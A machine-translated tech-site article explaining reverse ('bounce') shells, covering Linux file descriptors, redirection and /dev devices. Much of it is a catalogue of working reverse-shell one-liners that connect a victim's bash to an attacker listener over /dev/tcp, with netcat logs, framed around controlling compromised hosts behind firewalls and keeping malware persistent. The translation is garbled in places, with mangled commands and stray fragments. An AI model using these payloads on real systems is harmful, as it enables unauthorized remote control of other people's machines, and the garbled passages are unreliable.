Shulou(Shulou.com)06/01 Report--

This article mainly explains "what is the principle and function of bouncing shell". Interested friends may wish to take a look. The method introduced in this paper is simple, fast and practical. Next, let the editor take you to learn "what is the principle and function of rebounding shell"?

Bounce shell (reverse shell)

The control terminal listens to a certain TCP/UDP port, and the controlled terminal initiates a request to the port, and transfers the input and output of its command line to the control terminal.

The attacker specifies the server, and the victim host actively connects to the attacker's server program, which is called a bounce connection. Reverse shell corresponds to standard shell such as telnet,ssh, which is essentially a reversal of the roles of the client and the server of the network concept.

An in-depth understanding of file descriptors and redirects can better understand bouncing shell.

Scene

1. A client has been hit by your network horse, but it is in the local area network, you can not connect directly.

two。 The ip of the target machine changes dynamically, and you can't control it continuously.

3. Establish a server to allow malicious programs to connect actively and persist.

4. The firewall is limited to establish connections from the outside to the inside (external connections are not accepted). (interaction through full-duplex communication of transport layer protocols)

Note:

Full-duplex transmission (Full-Duplex Transmissions)

The switch can also receive data while sending data, and the two are carried out at the same time, just as we usually make phone calls, and we can also hear each other's voice while talking. Current switches support full duplex.

Simplex data transmission only supports data transmission in one direction; only one party can accept or send information at the same time, and can not achieve two-way communication, for example: television, radio, communication between computer and printer is simplex mode.

Half-duplex data transmission allows data to be transmitted in both directions, but at a certain time, data is only allowed to be transmitted in one direction, which is actually a kind of simplex communication in switching directions; only one party can receive or send information at the same time, and two-way communication can be realized. Example: walkie-talkie.

Definition of WIKI

A full-duplex (full-duplex) system allows two-way data transmission between two devices at the same time. In general, telephones and mobile phones are full-duplex systems, because the voice of the other person can be heard while speaking. A full-duplex system can be described as a general two-way lane. Vehicles in both directions will not affect each other because they use different lanes.

Experiment

Test 1:

Attack end:

[root@attacker] # nc-lvp 2333 / / first step Connection from victim_ip:38712docker0: flags=4099 mtu 1500 inet 172.17.0.1 netmask 255.255.0.0 broadcast 172.17.255.255 ether XXXXXXXXXX txqueuelen 0 (Ethernet) RX packets 0 bytes 0 (0.0B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 0 bytes 0 (0.0B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0eth0: flags=4163 mtu 1500 inet 172.22.181.6 netmask 255.255.240.0 broadcast 172.22.191.255 inet6 fe80::216:3eff:fe0e:9d06 prefixlen 64 scopeid 0x20// test results: redirect the standard output of the injured side to the attack side But it has not been realized to control the injured end with command.

Injured end:

[root@victim] # bash-I > / dev/tcp/attacker_ip/2333 / / second step [root@victim] # ifconfig / / third step [root@victim] #

Test 2:

Attack end:

[root@attacker] # nc-lvp 2333 / / first step Connection from victim_ip:38286hostname / / third step (execute command on the attacking side) idwhoami

Injured end:

[root@victim] # bash-I

< /dev/tcp/attacker_ip/2333 //第二步[root@victim]# hostname attacker[root@victim]# iduid=0(root) gid=0(root) groups=0(root)[root@victim]# whoamiroot[root@victim]#//测试结果：实现了将攻击端的输入重定向到受害端，但是攻击端看不到命令执行结果。底层原理 输出重定向 >

Equivalent to 1 >, input redirection & 1, this statement can be understood to match the error output with standard output, that is, to output them to a file:

The & symbol here is to distinguish a file from a file descriptor. If there is no & symbol here, the system will understand it (1) as a file, not as standard output.

Similarly, by adding 1 > & 2 to the end of the error output command, this statement can be understood to match the standard output with the error output, that is, to output them to a file:

See which files are opened by a process:

[root@lee] # nc-lvp 2333 [root@lee] # netstat-ntlp | grep 2333tcp 0 0 0.0.0 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 015 * LISTEN 16303/nc

/ proc/ [process ID] / fd this directory is dedicated to storing file descriptors

[root@lee] # ll / proc/16303/fdtotal 0lrwx-1 root root 64 Apr 20 14:41 0-> / dev/pts/1lrwx- 1 root root 64 Apr 20 14:41 1-> / dev/pts/1lrwx- 1 root root 64 Apr 20 14:41 2-> / dev/pts/1lrwx- 1 root root 64 Apr 20 14:41 3-> socket: [339049416] lrwx- 1 root root 64 Apr 20 14:41 6-> / dev/pts/1cd / dev/pts ll

I understand the number of tty above as the number of interactive shell (terminals). Tty devices include virtual console, serial port and pseudo terminal devices.

In the image above, I have started seven interactive shell with xshell, all of which are turned off and keep only one:

/ dev

Dev is an acronym for device. This directory contains all the external devices used in the Linux system. Is a port to access these external devices. We can easily access these external devices, and there is no difference between accessing a file or a directory. (Linux everything is a file)

/ dev/null

/ dev/null it is an empty device, also known as a bit bucket or black hole. You can enter any data into it, but any data written to it will be discarded. It is usually used to handle unwanted output streams. (of course, it can also be used as an empty input stream)

For example:

/ dev/zero

/ dev/zero

Create a file that is populated with NULL.

Dd if=/dev/zero of=foobar count=2 bs=1024 dd: copies a file with a block of the specified size and performs the specified conversion at the same time.

Linux Command Summary dd Command detailed explanation

/ dev/pty

Pseudo terminal (/ dev/pty/)

Pseudo terminals (Pseudo Terminal) are pairs of logical end devices (that is, master and slave devices, and operations on master are reflected on the slave).

/ dev/tty

/ dev/tty is a device-specific file for the control terminal of the current process.

Other / dev/hd [a murt]: IDE device / dev/sd [amurz]: SCSI device / dev/fd [0-7]: standard floppy drive / dev/md [0-31]: soft raid device / dev/loop [0-7]: local loopback device / dev/ram [0-15]: memory / dev/null: unlimited data receiving device Equivalent to black hole / dev/zero: infinite zero resource / dev/tty [0-63]: virtual terminal / dev/ttyS [0-3]: serial port / dev/lp [0-3]: parallel port / dev/console: console / dev/fb [0-31]: framebuffer/dev/cdrom = > / dev/hdc/dev/modem = > / dev/ttyS [0-9] / dev/pilot = > / dev/ttyS [0-9] / dev/random: random number device / Dev/urandom: random number device bash-I > & / dev/tcp/ip/port 0 > & 1

Bash-I means to create an interactive shell

/ dev/tcp/ip/port, this file does not exist, but when you are listening to this port, read and write to this file, you can achieve socket communication between the two hosts

First, we turn on listening on the attack machine, and then enter the following command on the Linux machine to send the specified characters to port 2333 of the attack machine through the tcp protocol:

Echo 1 > / dev/tcp/attacker_ip/2333

Attack aircraft monitoring:

Nc-lvp 2333Connection from victim_ip:499481

The same is true for UDP:

Echo 2 > / dev/udp/attacker_ip/2333

Attack aircraft monitoring:

Nc-luvp 2333Received packet from victim_ip:22367-> 192.168.0.226 purl 2333 (local) 1

2 > & 1 output error output and standard output to the same file (Linux everything file):

Target aircraft:

Echo1 1 > / dev/tcp/attacker_ip/2333 2 > & 1

Attack aircraft:

[root@attacker ~] # nc-lvp 2333Connection from victim_ip:5479-bash: echo1: command not found

Pass & 0 2 > & 0

Or:

Bash-I 0

< /dev/tcp/ip/2333 1>

& 0 2 > & 1 bash-I

< /dev/tcp/ip/2333 >

& 0 2 > & 1 bash-I 1 > / dev/tcp/ip/2333 0 > & 12 > & 1 bash-I 1 > / dev/tcp/ip/2333 0 > & 1 2 > & 0

Other deformations:

Bash-I 1 > & / dev/tcp/ip/port 0 > & 1 bash-I 1 > & / dev/tcp/ip/port 0 > & 2 bash-I & > / dev/tcp/ip/port 0 > & 1 bash-I & > / dev/tcp/ip/port 0 > & 2

& > or > & after bash-I indicates mixed output, that is, standard output 1 + error output 2

A little difference between bash and sh

Sh follows the POSIX specification: "when a line of code goes wrong, do not continue to explain." Bash continues to execute down even if something goes wrong.

To put it simply, sh is a special mode of bash. Sh is the bash that turns on the POSIX standard. / bin/sh is equivalent to / bin/bash-posix.

On Linux systems / bin/sh is often a symbolic link to / bin/bash

Ln-s / bin/bash / bin/sh other variants

The Unix operating system usually imposes a limit on the number of files each process can open, and ulimit-n looks at the system's default number of file descriptors.

For example:

# ulimit-n655360

Represents the file descriptor 0-655359 supported by the system

Page 1:

Open "File" and assign fd 655359 to it:

[J] filename# opens the file "filename" and assigns the file descriptor "j" to it in order to read and write "filename". # if the file "filename" does not exist, create it.

Eg:

Exec 655359 File

&-turn off standard output

N output-indicates that the n number output is turned off

Page2:

Attack aircraft:

[root@attacker] # nc-lvp 2333 # first step Connection from victim_ip:46414helloworld # third step 123

Injured machine:

[root@victim] # exec 65534/dev/tcp/attacker_ip/2333 # step 2 [root@victim] # cat & 8

Everyone is free to play.

At this point, I believe you have a deeper understanding of "the principle and function of bouncing shell". You might as well do it in practice. Here is the website, more related content can enter the relevant channels to inquire, follow us, continue to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.